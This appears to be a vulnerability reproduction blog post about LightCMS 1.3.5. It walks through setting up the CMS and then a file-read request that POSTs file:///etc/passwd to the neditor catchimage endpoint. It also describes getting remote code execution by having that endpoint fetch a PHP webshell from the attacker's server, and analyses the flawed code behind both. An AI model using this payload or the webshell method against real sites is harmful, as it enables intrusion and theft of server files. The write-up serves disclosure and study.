LightCMS1.3.5- Arbitrary File Reading & RCE Vulnerability

LightCMS1.3.5- Arbitrary File Reading & RCE Vulnerability

Environment Construction (Kali)

Personal environment configuration: php7.4.15 + mysql8.0.25
  1. First of all, make sure that composer is installed in the system, you can refer to the article I wrote before: article link
  2. Download file source code
cd /var/www/html
git clone https://hub.fastgit.org/eddy8/LightCMS.git
cd lightCMS
composer install
  1. Set directory permissions: storage/ and bootstrap/cache/ directories require write permissions.
sudo chmod 777 -R storage/ bootstrap/cache/
  1. Create a new environment configuration, and configure the database and other related configurations
cp .env.example .env

数据库配置:
CREATE DATABASE homestead;
CREATE USER 'homestead'@'localhost' IDENTIFIED BY 'secret';
GRANT ALL PRIVILEGES ON *.* TO 'homestead'@'localhost';
FLUSH PRIVILEGES;
Initialize the system
php artisan migrate --seed

PS:这里可能会遇到一些问题,我备注一下自己遇到的问题及其解决方案
1、安装组件时如果无法生成vendor目录可以运行composer install --ignore-platform-reqs命令
2、启动服务时Illuminate\Database\QueryException报错可能是因为没有安装php-mysql依赖
step1:php -v
step2: Install php mysql extension
php 7.x sudo apt-get install php7.x-mysql
step3: service apache2 restart
step4: php artisan migrate
  1. Background access address: /admin/login
默认用户(此用户为超级用户,不受权限管理限制):admin/admin
这里可能会遇到图形验证码无法显示,终端输入:apt-get install php7.x-gd
Insert picture description here

Vulnerability recurrence

Use point one

Use admin/admin to log in to the administrator
Visit http://ip/admin/neditor/serve/catchimage, POST file=file:///etc/passwd, then it will return
{"list":[{"url":"http://light.com/upload/image/202106/0f1726ba83325848d47e216b29d5ab99.jpg","source":"file:///etc/passwd","state":"SUCCESS"}]}
Insert picture description here
According to the return value, just visit the link address directly

Use point two

Directly transfer the php file RCE, construct a php script and place it under vps, access and read the file
Insert picture description here


Insert picture description here

Vulnerability analysis

This vulnerability lies in app/Http/Controllers/Admin/NEditorController.phpthe function of remotely downloading pictures in
Insert picture description here
Here is a simple use file_get_contentsto obtain and save the content of the file, so we can use the file protocol to implement arbitrary file reading and other ssrf operations. What is more dangerous is that the logic here is what the suffix of the file name is obtained and what suffix is ​​saved, so We can put a php sentence on the server, and then request the sentence file to achieve the purpose of getshell